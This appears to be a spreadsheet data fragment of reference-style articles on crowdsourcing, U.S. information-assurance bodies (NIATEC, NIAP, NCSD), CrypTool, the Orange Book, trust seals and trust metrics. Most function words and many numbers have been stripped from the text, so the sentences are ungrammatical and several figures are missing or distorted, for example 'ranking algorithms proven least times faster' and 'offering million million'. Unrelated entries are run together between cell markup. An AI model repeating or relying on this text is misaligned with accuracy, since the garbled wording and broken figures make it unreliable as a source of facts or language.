injustice.crowdsourcing either take explicit implicit route: explicit crowdsourcing lets users work together evaluate, share, build different specific tasks, implicit crowdsourcing means users solve problem side effect something else doing. with explicit crowdsourcing, users evaluate particular items like books webpages, share posting products items. users also build artifacts providing information editing people's work. implicit crowdsourcing take forms: standalone piggyback. standalone allows people solve problems side effect task actually doing, whereas piggyback takes users' information third-party website gather information. this also known data donation.in 2013 book, crowdsourcing, daren brabham puts forth problem-based typology crowdsourcing approaches: knowledge discovery management used information management problems organization mobilizes crowd find assemble information. ideal creating collective resources. distributed human intelligence tasking (hit) used information management problems organization information hand mobilizes crowd process analyze information. ideal processing large data sets computers cannot easily amazon mechanical turk uses approach. broadcast search used ideation problems organization mobilizes crowd come solution problem objective, provable right answer. ideal scientific problem-solving. peer-vetted creative production used ideation problems, organization mobilizes crowd come solution problem answer subjective dependent public support. ideal design, aesthetic, policy problems.ivo blohm identifies four types crowdsourcing platforms: microtasking, information pooling, broadcast search, open collaboration. they differ diversity aggregation contributions created. diversity information collected either homogenous heterogenous. aggregation information either selective integrative. some common categories crowdsourcing used effectively commercial world, including crowdvoting, crowdsolving, crowdfunding, microwork, creative crowdsourcing, crowdsource workforce management, inducement prize contests. although exhaustive list, items cover current major ways people crowds perform tasks. crowdvoting crowdvoting occurs website gathers large group's opinions judgments certain topic. some crowdsourcing tools platforms allow participants rank other's contributions, e.g. answer question "what thing make acme great company?" common method ranking "like" counting, contribution likes ranks first. this method simple easy understand, privileges early contributions, time accumulate likes. recent years several crowdsourcing companies begun pairwise comparisons, backed ranking algorithms. ranking algorithms penalize late contributions. they also produce results faster. ranking algorithms proven least times faster manual stack ranking. drawback, however, ranking algorithms difficult understand like counting. iowa electronic market prediction market gathers crowds' views politics tries ensure accuracy participants money sell contracts based political outcomes. some famous examples made social media channels: domino's pizza, coca-cola, heineken, adams thus crowdsourced pizza, bottle design, beer, song, respectively. threadless.com selects t-shirts sells users provide designs vote ones like, printed available purchase.the california report card (crc), program jointly launched january 2014 center information technology research interest society governor gavin newsom, example modern-day crowd voting. participants access online vote timely issues. through principal component analysis, users placed online "café" present political opinions grade suggestions participants. this system aims effectively involve greater public relevant political discussions highlight specific topics californians concerned. crowdvoting's value movie industry shown 2009 crowd accurately predicted success failure movie based trailer, feat replicated 2013 google.on reddit, users collectively rate content, discussions comments well questions posed persons interest "ama" askscience online interviews. 2017, project fanchise purchased team indoor football league created salt lake screaming eagles, team. using mobile fans voted day-to-day operations team, mascot name, signing players even offensive play calling games. crowdfunding crowdfunding process funding projects multitude people contributing small amount attain certain monetary goal, typically internet. crowdfunding used commercial charitable purposes. crowdfuding model around longest rewards-based crowdfunding. this model people prepurchase products, experiences, simply donate. while funding cases towards helping business, funders allowed invest become shareholders rewards-based crowdfunding.individuals, businesses, entrepreneurs showcase businesses projects entire world creating profile, typically includes short video introducing project, list rewards donation, illustrations images. goal create compelling message towards readers drawn. funders make monetary contribution numerous reasons: they connect greater purpose campaign, part entrepreneurial community supporting innovative idea product. they connect physical aspect campaign like rewards gains investment. they connect creative display campaign's presentation. they want products public.the dilemma equity crowdfunding 2012 securities exchange commission regulations refined sec, january 2013, tweak fundraising methods. regulators overwhelmed trying regulate dodd-frank rules regulations involving public companies trade. advocates regulation claimed crowdfunding would open flood gates fraud, called "wild west" fundraising, compared 1980s days penny stock "cold-call cowboys". process allows million raised without regulations involved. companies then-current proposal would exemptions available able raise capital larger pool persons, include lower thresholds investor criteria, whereas rules required person "accredited" investor. these people often recruited social networks, funds acquired equity purchase, loan, donation, ordering. amounts collected become quite high, requests million dollars software trampoline systems, used finance commercialization software. inducement prize contests web-based idea competitions inducement prize contests often consist generic ideas, cash prizes, internet-based platform facilitate easy idea generation discussion. example competitions includes event like ibm's 2006 "innovation jam", attended 140,000 international participants yielding around 46,000 ideas. another example netflix prize 2009. idea crowd come recommendation algorithm accurate netflix's algorithm. grand prize us$1,000,000, given bellkor's pragmatic chaos team bested netflix's algorithm predicting ratings, 10.06%. another example competition-based crowdsourcing 2009 darpa balloon experiment, darpa placed balloon markers across united states challenged teams compete first report location balloons. collaboration efforts required complete challenge quickly addition competitive motivation contest whole, winning team (mit, less nine hours) established "collaborapetitive" environment generate participation team. similar challenge challenge, funded state department, required locating photographing individuals five cities europe within hours based single photograph. winning team managed locate three suspects mobilizing volunteers worldwide using similar incentive scheme used balloon challenge.open innovation platforms effective crowdsourcing people's thoughts ideas research development. company innocentive crowdsourcing platform corporate research development difficult scientific problems posted crowds solvers discover answer cash prize, range $10,000 $100,000 challenge. innocentive, waltham, massachusetts, london, england, provides access millions scientific technical experts around world. company claims success rate providing successful solutions previously unsolved scientific technical problems. ideaconnection.com challenges people come inventions innovations ninesigma.com connects clients experts various fields. prize foundation creates runs incentive competitions offering million million solving challenges. local motors another example crowdsourcing. community 20,000 automotive engineers, designers, enthusiasts competes build off-road rally trucks. implicit crowdsourcing implicit crowdsourcing less obvious users necessarily know contributing, still effective completing certain tasks. rather users actively participating solving problem providing information, implicit crowdsourcing involves users another task entirely third party gains information another topic based user's actions.a good example implicit crowdsourcing game, users guess images labels used google images. another popular implicit crowdsourcing recaptcha, asks people solve captchas prove human, provides captchas books cannot deciphered computers, digitize web. like many tasks solved using mechanical turk, captchas simple humans, often difficult computers.piggyback crowdsourcing seen frequently websites google data-mine user's search history websites discover keywords ads, spelling corrections, finding synonyms. way, users unintentionally helping modify existing systems, google's adwords. other types creative crowdsourcing spans sourcing creative projects graphic design, crowdsourcing architecture, product design, apparel design, movies, writing, company naming, illustration, etc. while crowdsourcing competitions used decades creative fields (such architecture), creative crowdsourcing proliferated recent development web-based platforms clients solicit wide variety creative work lower cost traditional means. crowdshipping (crowd-shipping) peer-to-peer shipping service, usually conducted online platform marketplace. there several methods categorized crowd-shipping: travelers heading direction buyer, willing bring package part luggage reward. truck drivers whose route lies along buyer's location willing take extra items truck. community-based platforms connect international buyers local forwarders, allowing buyers forwarder's address purchase destination, forwarders ship items buyer. crowdsol</t>
  </si>
  <si>
    <t>Cruel Onion Wiki</t>
  </si>
  <si>
    <t>National Information Assurance Training and Education Center</t>
  </si>
  <si>
    <t>national information assurance training education center (niatec) american consortium academic, industry, government organizations improve literacy, awareness, training education standards information assurance. serves develop professionals expertise various disciplines, ultimately contributes protection national information infrastructure. niatec associated idaho state university, national security agency center academic excellence information assurance education. centers academic excellence niatec components plan establish federal cyber-corps defend cyber-based disruption attacks. niatec active development training standards associated national institute standards technology special publication 800-16 committee national security systems instructions 4011, 4012, 4013, 4014, 4015, 4016. corey schou director niatec. james frost associate director. group subscribes (isc)² code ethics. references external links official website</t>
  </si>
  <si>
    <t>CrypTool</t>
  </si>
  <si>
    <t>cryptool open-source project free e-learning software illustrating cryptographic cryptanalytic concepts. according "hakin9", cryptool worldwide widespread e-learning software field cryptology.cryptool implements algorithms. users adjust parameters. introduce users field cryptography, organization created multiple graphical interface software containing online documentation, analytic tools algorithms. they contain classical ciphers, well modern symmetric asymmetric cryptography including rsa, ecc, digital signatures, hybrid encryption, homomorphic encryption, diffie–hellman exchange. methods area quantum cryptography (like bb84 exchange protocol) area post-quantum cryptography (like mceliece, wots, merkle-signature-scheme, xmss, xmss_mt, sphincs) implemented. addition algorithms, solvers (analyzers) included, especially classical ciphers. other methods (for instance huffman code, aes, keccak, mss) visualized. addition contains: didactical games (like number shark, divider game, zudo-ku) interactive tutorials primes, elementary number theory, lattice-based cryptography. development, history roadmap development cryptool started 1998. originally developed german companies universities, open-source project since 2001. more sixty people worldwide contribute regularly project. contributions software plugins came universities schools following towns: belgrad, berlin, bochum, brisbane, darmstadt, dubai, duisburg-essen, eindhoven, hagenberg, jena, kassel, klagenfurth, koblenz, london, madrid, mannheim, jose, siegen, utrecht, warsaw.currently versions cryptool maintained developed: cryptool (ct1) software available languages (english, german, polish, spanish, serbian, french). cryptool (ct2) available languages (english, german, russian). others, jcryptool (jct) cryptool-online (cto), available english german.the goal cryptool project make users aware cryptography help network security threats explain underlying concepts cryptology.cryptool (ct1) written designed microsoft windows operating system. port linux started, progress anymore.in 2007, development began additional projects, based pure-plugin architecture, serve successors original cryptool program. both successors regularly publish stable versions: cryptool (built c#/.net/wpf) (abbreviated ct2)uses concept visual programming clarify cryptographic processes. currently, contains crypto functions. jcryptool (built java/eclipse/rcp/swt) (abbreviated jct)runs windows, macos, linux, offers document-centric function-centric perspective. currently, contains crypto functions. focal points modern digital signatures (like merkle trees sphincs). awards cryptool received several international awards educational program, teletrust special award 2004, eisa 2004, security award 2004, selected landmark land ideas 2008 award. cryptool used schools, universities, companies agencies education awareness training.worldwide, cryptool packages downloaded 10,000 times month cryptool website. just downloads english version. cryptool-online (abbreviated cto) cryptool project also includes website cryptool-online, launched 2009. this website allows users cryptographic methods directly within browser smartphone (using javascript), without need download install software. this site aims present topic easy attractive users young people. advanced tasks still require offline versions cryptool. mysterytwister (mtc3) 2010, international cipher contest mtc3 started part cryptool project. contest currently offers challenges derived modern ciphers designed different authors different countries. challenges presented templates english german. challenges clustered four levels difficulty, range simple riddles solvable paper-and-pencil mathematical challenges modern cryptanalysis researchers experts. additionally, moderated forum, user statistics, hall-of-fame available. currently, 10,000 registered users engaged solving challenges. merger cryptools early 2020, cryptool project decided merge similar project name, cryptools, founded 2017 australia arthur guiot, lucas gruwez luka lafaye micheaux. cryptool, much older known, thus completely "absorbs" project name. first impact merger rebranding project. logo, website, version announced. currently, still development. another change targeted audience. previously, cryptool focused (university) students, cryptools developers young people. therefore necessary broaden audience. 2020, midst covid-19 pandemic, cryptool announces creation tools test decentralized contact tracing protocols. page added technical description algorithms involved dp-3t exposure notification. addition this, cryptool also announced implementation page dedicated raising awareness cryptographic means related privacy protocols, called corona tracing animation. newer page stands design accessibility ordinary users. also asymmetric algorithm topics cryptography cryptosystem references external links official website cryptool-online international cipher contest "mysterytwister" (mtc3) presentation cryptool-1 program slides many screenshots</t>
  </si>
  <si>
    <t>National Information Assurance Partnership</t>
  </si>
  <si>
    <t>national information assurance partnership (niap) united states government initiative meet security testing needs information technology consumers producers operated national security agency (nsa), originally joint effort national institute standards technology (nist). purpose long-term goal niap help increase level trust consumers information systems networks cost-effective security testing, evaluation, validation programs. meeting goal, niap seeks promote development evaluated products systems champion development national international standards security common criteria foster research development security requirements definition, test methods, tools, techniques, assurance metrics support framework international recognition acceptance security testing evaluation results facilitate development growth commercial security testing industry within u.s. services common criteria evaluation validation scheme (ccevs) product system configuration guidance product protection profile evaluation consistency instruction manuals niap validation body principal objective niap validation body ensure provision competent security evaluation validation services government industry. validation body ultimate responsibility operation ccevs accordance policies procedures, appropriate: interpret amend policies procedures. responsible providing sufficient resources validation body carry responsibilities. validation body director deputy director selected management. director validation body reports niap director administrative budgetary matters certificate-issuing authorities ccevs related operational matters. general, director deputy director serve two-year term service. this term service extended discretion management. there also significant number technical administrative support personnel required provide full range validation services sponsors evaluations common criteria testing laboratories (cctl). these personnel include validators, technical experts various technology cells, senior members technical staff security community oversight board. validation body ensures appropriate mechanisms place protect interests parties within ccevs participating process security evaluation. dispute brought forth participating party, (i.e., sponsor evaluation, product protection profile developer cctl), concerning operation ccevs associated activities shall referred validation body resolution. disputes involving validation body, management attempt resolve dispute procedures agreed upon organizations. external links niap official site niap consistency instruction manuals</t>
  </si>
  <si>
    <t>National Information Assurance Glossary</t>
  </si>
  <si>
    <t>committee national security systems instruction 4009, national information assurance glossary, published united states federal government, unclassified glossary information security terms intended provide common vocabulary discussing information assurance concepts. glossary previously published national information systems security glossary (nstissi 4009) national security telecommunications information systems security committee (nstissc). under executive order (e.o.) 13231 october 2001, critical infrastructure protection information age, president george bush redesignated national security telecommunications information systems security committee (nstissc) committee national security systems (cnss). recent version revised april 2010. also encryption references external links national information assurance (ia) review national information assurance glossary terms</t>
  </si>
  <si>
    <t>National Cyber Security Division</t>
  </si>
  <si>
    <t>national cyber security division (ncsd) division office cyber security communications, within united states department homeland security's cybersecurity infrastructure security agency. formed critical infrastructure assurance office, national infrastructure protection center, federal computer incident response center, national communications system, ncsd opened june 2003. ncsd mission collaborate private sector, government, military, intelligence stakeholders conduct risk assessments mitigate vulnerabilities threats information technology assets activities affecting operation civilian government private sector critical cyber infrastructures. ncsd also provides cyber threat vulnerability analysis, early warning, incident response assistance public private sector constituents. ncsd carries majority dhs’ responsibilities comprehensive national cybersecurity initiative. 2011 budget request ncsd $378.744 million includes federal positions. current director ncsd john streufert, former chief information security officer (ciso) united states department state, assumed position january 2012. strategic objectives priorities strategic objectives protect cyber infrastructure, ncsd identified overarching objectives: build maintain effective national cyberspace response system. implement cyber-risk management program protection critical infrastructure.priorities continued development einstein system’s capabilities critical tool protecting federal executive branch civilian departments agencies. development national cyber incident response plan (ncirp) full collaboration private sector stakeholders. ncirp ensures national cybersecurity partners understand roles cyber incident response prepared participate coordinated managed process. increase security automated control systems operate elements national critical infrastructure. organization ncsd funded following three congressionally appropriated programs, projects activities (ppa): united states computer emergency readiness team (us-cert), strategic initiatives, outreach programs: us-cert leverages technical competencies federal network operations threat analysis centers develop knowledge knowledge management practices. us-cert provides single, accountable focal point support federal stakeholders make operational implementation decisions secure federal executive branch civilian networks. holistic approach enables federal stakeholders address cybersecurity challenges manner maximizes value minimizing risks associated technology security investments. further, us-cert analyzes threats vulnerabilities, disseminates cyber threat warning information, coordinates partners customers achieve shared situational awareness related nation’s cyber infrastructure. us-cert funds also support development, acquisition, deployment, personnel required implement national cybersecurity protection system (ncps), operationally known einstein. einstein program automated intrusion detection system collecting, correlating, analyzing, sharing computer security information across federal government improve nation’s situational awareness. einstein early warning system monitors network gateways federal executive branch civilian departments agencies malicious cyber activity. deploying einstein systems conjunction federal initiative, optimizes network security capabilities common solution federal executive branch facilitates reduction consolidation external connections, including internet points presence, approved access points. march 2012, einstein currently staged roll-out federal agencies reached high compliance. national cybersecurity center (ncsc) component us-cert’s budget. ncsc fulfills presidential mandate outlined national security presidential directive 54/homeland security presidential directive ensuring federal agencies access receive information intelligence needed execute respective cybersecurity missions. ncsc accomplishes following mission areas: mission integration, collaboration coordination, situational awareness cyber incident response, analysis reporting, knowledge management, technology development management, supported developing ncsc programs capabilities. strategic initiatives enables ncsd establish mechanisms federal partners deploy standardized tools services reduced cost, paving collaborative environment enables sharing best practices common security challenges shortfalls. addition, strategic initiatives enables nppd develop promulgate sound practices software developers, security professionals, cikr stakeholders; also enables collaboration public private sectors assess mitigate risk nation’s cyber cikr. outreach programs promotes opportunities leverage cybersecurity investments public private industry partners. this encourages cybersecurity awareness among general public within communities, maintains relationships government cybersecurity professionals share information cybersecurity initiatives, develops partnerships promote collaboration cybersecurity issues. outreach programs enables governance assistance setting policy direction establishes resource requirements ncsd’s complex activities. early leadership turnover ncsd plagued leadership problems, multiple directors resign serving short terms, potential candidates position director refuse position. chair pre-existing counter-terrorism security group, richard clarke initially offered position director ncsd, refused citing concerns would many bureaucratic layers homeland security director ridge. robert liscouski division initially permanent director sought continued assistant director february 2005. amit yoran became director ncsd september 2003 helped division, year job, left abruptly october 2004. division's deputy directors, andy purdy, assumed position interim director within week yoran's departure. 2006 upon andy purdy's departure jerry dixon took role acting director december 2006 officially appointed position executive director january 2007. upon dixon's departure september 2007 mcguire took role acting director march 2008 usss assigned cornelius tate current director ncsd. audit division, conducted dhs's inspector general clark kent ervin, cast negative view division's first year. although report praised formation u.s. computer emergency readiness team (us-cert) national cyber alert system, division received criticism failing priorities, develop strategic plans provide effective leadership cyber security issues. references external links national cybersecurity division webpage this article incorporates public domain material websites documents united states department homeland security.</t>
  </si>
  <si>
    <t>National Information Assurance Certification and Accreditation Process</t>
  </si>
  <si>
    <t>national information assurance certification accreditation process (niacap) formerly minimum-standard process certification accreditation computer telecommunications systems handle u.s. national-security information. niacap derived department defense certification accreditation process (ditscap), played role national information assurance partnership. committee national security systems (cnss) policy (cnssp) dated january 2012 cancelled cnss policy “national policy certification accreditation national security systems,” dated october 2005, national security telecommunications information systems security instruction (nstissi) 1000, “national information assurance certification accreditation process (niacap),” dated april 2000. cnssp also states "the cnss intends adopt national institute standards technology (nist) issuances applicable. additional cnss issuances occur needs sufficiently addressed nist document. annex identifies guidance documents, includes nist special publications (sp), establishing organization-wide risk management program." directs organization make nist special publication 800-37, implies risk management framework (rmf) step authorize information system replaces certification accreditation process national security systems, areas federal government fall 800-37 rev. references "national policy certification accreditation national security systems" (pdf). archived original (pdf) august 2008. retrieved december 2009. "national information assurance certification accreditation process (niacap)" (pdf). archived original (pdf) october 2008. retrieved december 2009. committee national security systems (2012), committee national security systems (cnss) policy (cnssp) policy information assurance risk management national security systems, washington, d.c.: committee national security systems joint task force transformation initiative (2010), nist special publication 800-37 revision guide applying risk management framework federal information systems: security life cycle approach, washington, d.c.: computer security division, information technology laboratory, national institute standards technology, u.s. department commerce, doi:10.6028/nist.sp.800-37r1</t>
  </si>
  <si>
    <t>Trusted Computer System Evaluation Criteria</t>
  </si>
  <si>
    <t>trusted computer system evaluation criteria (tcsec) united states government department defense (dod) standard sets basic requirements assessing effectiveness computer security controls built computer system. tcsec used evaluate, classify, select computer systems considered processing, storage, retrieval sensitive classified information.the tcsec, frequently referred orange book, centerpiece rainbow series publications. initially issued 1983 national computer security center (ncsc), national security agency, updated 1985, tcsec eventually replaced common criteria international standard, originally published 2005. fundamental objectives requirements october 2002, orange book (aka dodd 5200.28-std) canceled dodd 8500.1, later reissued dodi 8500.02, march 2014. policy security policy must explicit, well-defined, enforced computer system. three basic security policies specified: mandatory security policy enforces access control rules based directly individual's clearance, authorization information confidentiality level information sought. other indirect factors physical environmental. this policy must also accurately reflect laws, general policies relevant guidance rules derived. marking systems designed enforce mandatory security policy must store preserve integrity access control labels retain labels object exported. discretionary security policy enforces consistent rules controlling limiting access based identified individuals determined need-to-know information. accountability individual accountability regardless policy must enforced. secure means must exist ensure access authorized competent agent evaluate accountability information within reasonable amount time without undue difficulty. accountability objective includes three requirements: identification process used recognize individual user. authentication verification individual user's authorization specific categories information. auditing audit information must selectively kept protected actions affecting security traced authenticated individual. assurance computer system must contain hardware/software mechanisms independently evaluated provide sufficient assurance system enforces requirements. extension, assurance must include guarantee trusted portion system works intended. accomplish objectives, types assurance needed respective elements: assurance mechanisms operational assurance: system architecture, system integrity, covert channel analysis, trusted facility management, trusted recovery life-cycle assurance security testing, design specification verification, configuration management, trusted system distribution continuous protection assurance trusted mechanisms enforce basic requirements must continuously protected tampering unauthorized changes. documentation within class, additional documentation addresses development, deployment, management system rather capabilities. this documentation includes: security features user's guide, trusted facility manual, test documentation, design documentation divisions classes tcsec defines four divisions: division highest security. each division represents significant difference trust individual organization place evaluated system. additionally divisions broken series hierarchical subdivisions called classes: a1.each division class expands modifies indicated requirements immediately prior division class. minimal protection reserved systems evaluated fail meet requirement higher division. discretionary protection discretionary security protectionidentification authentication separation users data discretionary access control (dac) capable enforcing access limitations individual basis required system documentation user manuals controlled access protection more finely grained individual accountability login procedures audit trails object reuse resource isolation example system hp-ux mandatory protection labeled security protectioninformal statement security policy model data sensitivity labels mandatory access control (mac) selected subjects objects label exportation capabilities some discovered flaws must removed otherwise mitigated design specifications verification structured protection security policy model clearly defined formally documented enforcement extended subjects objects covert storage channels analyzed occurrence bandwidth carefully structured protection-critical non-protection-critical elements design implementation enable comprehensive testing review authentication mechanisms strengthened trusted facility management provided administrator operator segregation strict configuration management controls imposed operator administrator roles separated. example system multics security domains satisfies reference monitor requirements structured exclude code essential security policy enforcement significant system engineering directed toward minimizing complexity security administrator role defined audit security-relevant events automated imminent intrusion detection, notification, response trusted path user authentication function trusted system recovery procedures covert timing channels analyzed occurrence bandwidth example system xts-300, precursor xts-400 verified protection verified designfunctionally identical formal design verification techniques including formal top-level specification formal management distribution procedures examples a1-class systems honeywell's scomp, aesec's gemsos, boeing's server. unevaluated production lock platform cancelled security kernel. beyond system architecture demonstrates requirements self-protection completeness reference monitors implemented trusted computing base (tcb). security testing automatically generates test-case formal top-level specification formal lower-level specifications. formal specification verification verified source code level, using formal verification methods feasible. trusted design environment designed trusted facility trusted (cleared) personnel. matching classes environmental requirements publication entitled "army regulation 380-19" example guide determining system class used given situation. also 380-19 superseded 25-2 canadian trusted computer product evaluation criteria common criteria itsec rainbow series trusted platform module references external links national security institute 5200.28-std trusted computer system evaluation criteria trusted computer system evaluation criteria 5200.28</t>
  </si>
  <si>
    <t>Trust seal</t>
  </si>
  <si>
    <t>trust seal seal granted entity websites businesses display. often purpose demonstrate customers business concerned security business identity. requirements displaying merchant vary, typically involve dedication good security practices, secure methods transactions, importantly verified existence company. trust seals come variety forms, including data security seals, business verified seals privacy seals available variety companies, fee. trust seal either active passive. most seals validated created remain specific duration time, post expiry business/process re-validated. kinds trust seals privacy seal privacy seal outfits company privacy statement suited business practices. also helps company identify potential privacy threats would otherwise unnoticed. truste example privacy seal. business practice seals these seals endorse operational practice business. example, endorsement manufacturing quality practices company. privacy seals subset category popular enough, specifically online retailers, mentioned separately. better business bureau seal example business practice seal. business identity seal business identity seal, also known verified existence seal, verifies legal, physical actual existence business verifying multiple parameters statutory details, contact details, management details, etc. verified existence trust seals weight profiles deployers boost confidence prospective clients. major benefit verified trust seal represents diligence grantor granting certificate business. security seals security trust seals popular type trust seal verification. there different types; server verification site verification. server verification services perform daily scans hosting server. these scans check make sure patches applied server otherwise vulnerable attacks. website verification services ensure customers protected normal circumstances testing common vulnerabilities cross site scripting (xss) injection. norton trustedsite popular security seals. criticisms third party verification reliable source strategically placed trust seal assure customers safety security. some trust seals, mcafee hacker safe, however, criticized enough protect security visitors site intentionally mark 'hacker safe' websites known mcafee vulnerability this possible seals simple image hacker simply copy paste onto site. such lapses highlight importance anti-xss protection security measures. trust seals give false sense security awarded certain point time, unless website scanned daily basis scan date displayed. when site scanned daily, change technology loopholes updated along trusted seal, represent flaws updated technology. iconographical value high mislead customers unaware changes. fined fraudulent seal companies provide real security benefit. examples 2005, market on-line, truste, symantec webtrust generally recognized significant players. also notable are: geotrust, digicert, norton, comodo, merchantcircle. some good examples business practice seals bbb, scanverify trustlock. cdsbureau trust seal unique among trust seals certifies businesses ensure security customer confidential data kept digital, paper, possible form. cdsbureau free comes privacy, cyber, data security trust. study published 2016 copenhagen-based usability consultancy, baymard institute ranked four trust seals alphabetical order) bbb, norton secured (formerly symantec trust seal), google trusted store truste. february 2017, google announced closing google trusted store label folding google customer reviews. certification program collects reviews customers make purchase receive merchandise. except gcr, offers "for fee" annual subscription service, allowing trust seal placed subscriber's website subscription period. also privacy seal trustmark (commerce) trust signals references</t>
  </si>
  <si>
    <t>Trust no one (Internet security)</t>
  </si>
  <si>
    <t>trust (tno) approach towards internet software security issues. internet communication software packages sort secrecy needed, usually sort encryption applied. trust approach teaches (but oneself) trusted comes storage keys behind applied encryption technology. many encryption technologies rely trust external party. instance security secure end-to-end connections relies trust certificate authority (ca). trust design philosophy requires keys encryption always stay, hands user applies them. this implies external party access encrypted data (assumed encryption strong enough). also implies external party cannot provide backup mechanism password recovery. although philosophy trust least assures reliability communication user creates real life society many communication means rely trust relationship least parties. also zero trust security model threat model encryption</t>
  </si>
  <si>
    <t>Trust metric</t>
  </si>
  <si>
    <t>psychology sociology, trust metric measurement metric degree social actor individual group) trusts another social actor. trust metrics abstracted manner implemented computers, making interest study engineering virtual communities, friendster livejournal. trust escapes simple measurement meaning subjective universally reliable metrics, fact mental process, unavailable instruments. there strong argument simplistic metrics measure trust complexity process 'embeddedness' trust makes impossible isolate trust related factors. there generally agreed properties make particular trust metric better others, metric designed serve different purposes, e.g. provides certain classification scheme trust metrics. groups trust metrics identified: empirical metrics focusing supporting capture values trust reliable standardized way; formal metrics focus formalization leading ease manipulation, processing reasoning trust. formal metrics classified depending properties.trust metrics enable trust modelling reasoning trust. they closely related reputation systems. simple forms binary trust metrics found e.g. pgp. first commercial forms trust metrics computer software applications like ebay's feedback rating. slashdot introduced notion karma, earned activities perceived promote group effectiveness, approach influential later virtual communities. empirical metrics empirical metrics capture value trust exploring behavior introspection people, determine perceived expressed level trust. those methods combine theoretical background (determining measure) defined questions statistical processing results. willingness cooperate, well actual cooperation, commonly used demonstrate measure trust. actual value (level trust and/or trustworthiness) assessed difference observed hypothetical behaviors i.e. would anticipated absence cooperation. surveys surveys capture level trust means observations introspection, without engaging experiments. respondents usually providing answers questions statements responses e.g. structured according likert scale. differentiating factors underlying theoretical background contextual relevance. earliest surveys mccroskey's scales used determine authoritativeness (competence) character (trustworthiness) speakers. rempel's trust scale rotter's scale quite popular determining level interpersonal trust different settings. organizational trust inventory (oti) example exhaustive, theory-driven survey used determine level trust within organisation. particular research area specific survey developed. example, interdisciplinary model trust, verified using survey uses survey establish relationship design elements site perceived trustworthiness games another empirical method measure trust engage participants experiments, treating outcome experiments estimates trust. several games game-like scenarios tried, estimate trust confidence monetary terms (see interesting overview). games trust designed nash equilibrium differ pareto optimum player alone maximize utility altering selfish strategy without cooperation, cooperating partners benefit. trust therefore estimated basis monetary gain attributable cooperation. original 'game trust' described abstracted investment game investor broker. game played several times, randomly chosen players pairs know other, yielding different results. several variants game exist, focusing different aspects trust observable behaviour. example, rules game reversed called game distrust, declaratory phase introduced rules presented variety ways, altering perception participants. other interesting games e.g. binary-choice trust games, gift-exchange game, cooperative trust games, various forms social games. specifically prisoners dilemma popularly used link trust economic utility demonstrate rationality behind reciprocity. multi-player games, different forms close market simulations exist formal metrics formal metrics focus facilitating trust modelling, specifically large scale models represent trust abstract system (e.g. social network trust). consequently, provide weaker insight psychology trust, particulars empirical data collection. formal metrics tend strong foundations algebra, probability logic. representation there widely recognised attribute value level trust, representation 'trust value' claiming certain advantages disadvantages. there systems assume binary values, fixed scale, confidence range -100 +100 (while excluding zero), +1); confidence discrete continuous, one-dimensional many dimensions. some metrics ordered values without attempting convert particular numerical range (e.g. detailed overview). there also disagreement semantics values. disagreement regarding attribution values levels trust specifically visible comes meaning zero negative values. example, zero indicate either lack trust (but distrust), lack information, deep distrust. negative values, allowed, usually indicate distrust, doubt whether distrust simply trust negative sign, phenomenon own. subjective probability subjective probability focuses trustor's self-assessment trust trustee. such assessment framed anticipation regarding future behaviour trustee, expressed terms probability. such probability subjective specific given trustor, assessment situation, information available etc. situation trustors different level subjective probability. subjective probability creates valuable link formalisation empirical experimentation. formally, subjective probability benefit available tools probability statistics. empirically, subjective probability measured one-side bets. assuming potential gain fixed, amount person bets used estimate subjective probability transaction. uncertain probabilities (subjective logic) logic uncertain probabilities (subjective logic) introduced josang, uncertain probabilities called subjective opinions. this concept combines probability distribution uncertainty, opinion trust viewed distribution probability distributions distribution qualified associated uncertainty. foundation trust representation opinion evidence confidence) trust represented four-tuple (trust, distrust, uncertainty, base rate), trust, distrust uncertainty must one, hence dependent additivity. subjective logic example computational trust uncertainty inherently embedded calculation process visible output. one, e.g. possible similar quadruplet (trust, distrust, unknown, ignorance) express value confidence, long appropriate operations defined. despite sophistication subjective opinion representation, particular value four-tuple related trust easily derived series binary opinions particular actor event, thus providing strong link formal metric empirically observable behaviour. finally, certaintrust certainlogic. both share common representation, equivalent subjective opinions, based three independent parameters named 'average rating', 'certainty', 'initial expectation'. hence, bijective mapping certaintrust-triplet four-tuple subjective opinions. fuzzy logic fuzzy systems, trust metrics link natural language expressions meaningful numerical analysis. application fuzzy logic trust studied context peer-to-peer networks improve peer rating. also grid computing demonstrated fuzzy logic allows solve security issues reliable efficient manner. properties trust metrics properties satisfied trust metric vary, depending application area. following list typical properties. transitivity transitivity highly desired property trust metric. situations trusts trusts transitivity concerns extent trusts without transitivity, trust metrics unlikely used reason trust complex relationships. intuition behind transitivity follows everyday experience 'friends friend' (foaf), foundation social networks. however, attempt attribute exact formal semantics transitivity reveals problems, related notion trust scope context. example, defines conditions limited transitivity trust, distinguishing direct trust referral trust. similarly, shows simple trust transitivity always hold, based information advogato model and, consequently, proposed trust metrics. simple, holistic approach transitivity characteristic social networks (foaf, advogato). follows everyday intuition assumes trust trustworthiness apply whole person, regardless particular trust scope context. trusted friend, also trusted recommend endorse another friend. therefore, transitivity semantically valid without constraints, natural consequence approach. thorough approach distinguishes different scopes/contexts trust, allow transitivity contexts semantically incompatible inappropriate. contextual approach may, instance, distinguish trust particular competence, trust honesty, trust ability formulate valid opinion, trust ability provide reliable advice sources information. contextual approach often used trust-based service composition. understanding trust contextual (has scope) foundation collaborative filtering. operations formal trust metric useful, define operations values trust result operations produce values trust. usually least elementary operators considered: fusion provides quasi-additive functionality, allowing consolidate trust values coming several sources; discounting provides quasi-multiplicative functionality, allowing advice/trust opinion provided source discounted function trust source, principle transitive trust computation.the exact semantics operators specific metric. even within representation, still possibility variety semantic interpretations. example, representation logic uncertain probabilities, trust fusion operations interpreted applying different rules (cumulative fusion, averaging fusion, constraint fusion (dempster's rule), yager's modified dempster's rule, inagaki's unified combination rule, zhang's centre combination rule, dubois prade's disjunctive consensus rule etc.). each interpretations leads different results, depending assumptions trust fusion particular situatation modelled. detailed discussions. scalability growing size networks trust make scalability another desired property, meaning computationally feasible calculate metric large networks. scalability usually puts requirements metric: elementary operation (e.g. fusion discount) computationally feasible, e.g. relationships context trust quickly established. number elementary operations scale slowly growth network. attack resistance attack resistance important non-functional property trust metrics reflects ability overly influenced agents manipulate trust metric participate faith (i.e. abuse presumption trust). free software developer resource advogato based novel approach attack-resistant trust metrics raph levien. levien observed google's pagerank algorithm understood attack resistant trust metric rather similar behind advogato. also like button trustworthiness trust subjective logic moderation system references sources dencheva, prause, prinz, (september 2011). dynamic self-moderation corporate wiki improve participation contribution quality (pdf). proceedings 12th european conference computer supported cooperative work (ecscw 2011). aarhus, denmark. archived original (pdf) 2014-11-29. jøsang, (2016), subjective logic; formalism reasoning under uncertainty springer, cham, isbn 978-3-319-42337-1 vavilis, petković, zannone, (2014). reference model reputation systems" (pdf). 